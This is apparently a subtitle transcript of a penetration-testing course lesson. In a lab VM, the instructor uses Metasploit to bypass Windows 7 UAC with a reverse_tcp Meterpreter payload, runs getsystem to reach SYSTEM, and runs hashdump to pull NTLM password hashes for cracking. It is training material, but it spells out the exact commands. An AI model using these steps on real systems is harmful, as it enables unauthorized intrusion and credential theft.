1 00:00:01,020 --> 00:00:08,310 In the last lesson, we saw how to use the Meterpreter to run commands on a Windows 7 computer
2 00:00:08,430 --> 00:00:10,690 from a Kali Linux box.
3 00:00:10,710 --> 00:00:16,410 It's like we've got a shell open or a command prompt open on the Windows 7 box, but we're running
4 00:00:16,410 --> 00:00:19,640 it from a remote Kali Linux computer.
5 00:00:20,130 --> 00:00:26,670 What we saw that we couldn't do, though, was run administrative level commands, like maybe removing
6 00:00:27,030 --> 00:00:31,430 the game.exe file so that it's no longer there, or running hashdump,
7 00:00:31,440 --> 00:00:33,510 so we pull passwords from the computer.
8 00:00:34,200 --> 00:00:40,530 We're going to see how we can get that system level access with another exploit called privilege escalation.
9 00:00:41,100 --> 00:00:47,400 We're going to bypass the user account controls and we're going to become a system level user on a Windows
10 00:00:47,400 --> 00:00:48,420 7 box.
11 00:00:48,990 --> 00:00:51,420 So we're in this interactive session in Meterpreter.
12 00:00:51,420 --> 00:00:54,300 So the very first thing we need to do is put that in the background.
13 00:00:54,300 --> 00:00:56,640 We can access it again with sessions.
14 00:00:59,330 --> 00:01:05,840 So we'll background Meterpreter, and we're back in regular Metasploit, so we can clear the screen,
15 00:01:06,470 --> 00:01:14,150 and we're still connected with that Windows 7 computer, so we can use a new exploit called exploit
16 00:01:15,260 --> 00:01:24,830 /windows/local/bypassuac.
17 00:01:24,830 --> 00:01:26,390 That's bypassuac.
18 00:01:26,390 --> 00:01:28,210 I just had to do byp, tab.
19 00:01:28,610 --> 00:01:33,920 We're going to bypass those user account controls on this Windows 7 computer and we're going to
20 00:01:33,920 --> 00:01:35,060 become a root user.
21 00:01:35,070 --> 00:01:39,050 So we're going to root Windows 7, just like with the other exploit.
22 00:01:39,050 --> 00:01:42,290 We need to show the options.
23 00:01:44,400 --> 00:01:50,490 And you can see we need a session number for this, so our session number, of the machine that we
24 00:01:50,490 --> 00:01:52,370 were just talking to, is session number one.
25 00:01:52,680 --> 00:02:00,450 So we'll say set SESSION, with SESSION all uppercase, 1, and then we'll show options again.
26 00:02:03,380 --> 00:02:08,750 And now our session is set correctly to 1, and the technique is an executable, but that's OK, we
27 00:02:08,750 --> 00:02:10,200 don't need to change anything there.
28 00:02:10,760 --> 00:02:12,860 We're going to set payload.
29 00:02:15,190 --> 00:02:26,230 windows/meterpreter/reverse_tcp, reverse underscore TCP, press enter.
30 00:02:27,830 --> 00:02:34,790 So we're still using this same Meterpreter payload to send things back and forth. We'll show the options
31 00:02:34,790 --> 00:02:35,240 again.
32 00:02:36,920 --> 00:02:42,590 We want to set the local host, or the LHOST option, to our Linux computer.
33 00:02:43,700 --> 00:02:46,160 So we will set LHOST.
34 00:02:49,280 --> 00:02:55,580 To 10.0.3.5 for my computer. Make sure you're using whatever your ifconfig
35 00:02:55,910 --> 00:02:59,350 said from your other window. Set LHOST.
36 00:02:59,390 --> 00:03:03,140 Now we'll do a show options again, and we've got the LHOST in there correctly.
37 00:03:03,710 --> 00:03:05,930 Now we're in the bypassuac.
38 00:03:06,450 --> 00:03:10,940 So let's run that exploit by typing exploit and hitting enter.
39 00:03:14,220 --> 00:03:17,370 Now you will see the exploit really going to work.
40 00:03:17,550 --> 00:03:22,290 It's got the reverse TCP handler that's connected, the UAC is enabled.
41 00:03:22,350 --> 00:03:25,070 Checking the level, UAC is set to Default.
42 00:03:25,080 --> 00:03:26,250 It's bypassing.
43 00:03:26,490 --> 00:03:29,910 And now we're part of the administrators group, continuing.
44 00:03:30,240 --> 00:03:35,130 You can see it's uploaded the agent, the file system, the Meterpreter stager's going.
45 00:03:35,130 --> 00:03:39,210 So we have a brand new session, session 2.
46 00:03:39,210 --> 00:03:43,110 And I'm already in Meterpreter, so I don't have to use the sessions command here.
47 00:03:43,470 --> 00:03:50,640 I can just say getuid and it shows I'm still a user.
48 00:03:50,670 --> 00:04:00,210 Well, what's this command: getsystem -t 1. getsystem -t
49 00:04:00,240 --> 00:04:05,160 1 uses technique 1, which happens to be named pipe impersonation.
50 00:04:05,520 --> 00:04:08,700 Just a way of getting administrative level privileges.
51 00:04:08,970 --> 00:04:14,250 So I'm no longer the getuid IE8Win7\IEUser user.
52 00:04:14,490 --> 00:04:21,930 If I hit the up arrow a couple of times and get the user ID again, I am now NT AUTHORITY\SYSTEM.
53 00:04:22,200 --> 00:04:28,110 I am the Windows 7 NT operating system, system level user.
54 00:04:28,260 --> 00:04:32,580 So I am the administrator, root, on this Windows 7 computer.
55 00:04:33,090 --> 00:04:43,530 Now I can run pwd, and I'm in Windows\System32, so I can cd all the way to root, cd into Users.
56 00:04:46,400 --> 00:04:51,660 ls, and you can see I've got a few users there, and I'm going to cd into IEUser.
57 00:04:57,790 --> 00:05:01,270 cd into their Desktop, Downloads folder.
58 00:05:04,410 --> 00:05:10,980 I can see that game.exe. I won't be able to remove game.exe right now, and why is that?
59 00:05:11,100 --> 00:05:17,040 Well, because game.exe is what's running in memory on that Windows 7 computer and connecting
60 00:05:17,040 --> 00:05:19,170 me into that box.
61 00:05:19,350 --> 00:05:23,640 But now I am an administrative user, so I can do some other useful things.
62 00:05:24,180 --> 00:05:33,540 For example, I can dump all the password hashes, so I can run hashdump, and hashdump has shown me some
63 00:05:33,540 --> 00:05:35,330 pretty interesting things already.
64 00:05:35,340 --> 00:05:38,550 Do you see this IEUser's password?
65 00:05:38,670 --> 00:05:45,030 It already told me, because we had a password hint in this Windows 7 computer that we downloaded
66 00:05:45,030 --> 00:05:50,190 as a VM that gave me the hint that the password for a user is password.
67 00:05:50,470 --> 00:05:54,180 Well, it's usually not that easy, but do you see these hash values down here?
68 00:05:54,180 --> 00:05:57,660 These are NTLM hashes for the administrator.
69 00:05:57,660 --> 00:06:03,600 Password looks like it's the same as the guest password, which is probably blank on this VM, and then
70 00:06:03,600 --> 00:06:04,410 the user.
71 00:06:04,410 --> 00:06:08,030 This is the hash that would give me password.
72 00:06:08,610 --> 00:06:14,010 Well, it turns out we can use this hash if we just copy these values.
73 00:06:15,040 --> 00:06:19,780 And save them into a file or copy them, and now that we've got our Guest Additions, we can copy and
74 00:06:19,780 --> 00:06:27,130 paste back over into our desktop PC, our host machine, but we'll be able to find out what that password
75 00:06:27,130 --> 00:06:34,160 is just by running a couple of different password attacks against this NTLM hash.
76 00:06:34,630 --> 00:06:39,700 So even though this is a one-way hash, or an encoded version of the password, I'll be able to recover
77 00:06:39,700 --> 00:06:40,660 it and get it back.
78 00:06:41,170 --> 00:06:45,520 Just for good measure, let's move back over to the Windows 7 computer, add a couple more user
79 00:06:45,520 --> 00:06:50,290 accounts, and then come back and run this hashdump again.
80 00:06:50,770 --> 00:07:00,040 So I'm in my Windows 7 VM and I'm going to come to the Start menu, Control Panel, User Accounts, and
81 00:07:00,040 --> 00:07:02,520 I'm going to add or remove user accounts.
82 00:07:02,950 --> 00:07:04,540 Let's create a new account.
83 00:07:05,230 --> 00:07:06,550 Let's create a new account.
84 00:07:06,550 --> 00:07:07,600 Name: Fred.
85 00:07:09,940 --> 00:07:13,900 And let's make Fred's password. Create a password.
86 00:07:15,410 --> 00:07:19,040 Wilma, W-I-L-M-A.
87 00:07:20,180 --> 00:07:21,530 Create that password.
88 00:07:23,610 --> 00:07:26,280 Manage another account, create a new account, Wilma.
89 00:07:28,870 --> 00:07:31,810 And let's make her password Fred.
90 00:07:35,700 --> 00:07:37,020 Create that password.
91 00:07:38,410 --> 00:07:40,670 Now we have two more users, Fred and Wilma.
92 00:07:40,720 --> 00:07:47,080 Let's go back over to our Kali Linux box and see if we can dump those hashes. Just hit the up arrow
93 00:07:47,080 --> 00:07:48,190 again, run hashdump.
94 00:07:48,190 --> 00:07:54,820 And because we're still connected to that Windows 7 computer, hashdump will pull us the fresh,
95 00:07:54,820 --> 00:08:00,430 up-to-the-minute list of all the usernames and their hashed passwords.
96 00:08:02,600 --> 00:08:08,450 So you can see my Administrator and Guest accounts, my IEUser, Fred and Wilma, and notice they
97 00:08:08,450 --> 00:08:13,330 have different hash values out here, because those are three different passwords.
98 00:08:14,060 --> 00:08:16,730 We'll see how to crack those in the password section.
99 00:08:17,030 --> 00:08:18,530 So I'm going to copy this.
100 00:08:19,370 --> 00:08:22,670 And for now, I'm just going to store it in Leafpad by pasting it.
101 00:08:23,750 --> 00:08:25,760 And go to File, Save As.
102 00:08:28,690 --> 00:08:35,350 And save this to my root Documents as win7
103 00:08:36,710 --> 00:08:45,890 hashes.txt. We'll use these password hashes in the password cracking section, but for right
104 00:08:45,890 --> 00:08:51,110 now we can see that we can do administrative level things, even things that are hard to do on the Windows
105 00:08:51,110 --> 00:08:52,010 box directly.
106 00:08:52,010 --> 00:08:57,110 I can do easily through this Meterpreter session from Kali Linux.
107 00:08:57,770 --> 00:09:03,020 We'll do a little review and then we'll see how to use those passwords and how to crack those hashes
108 00:09:03,110 --> 00:09:04,340 in an upcoming section.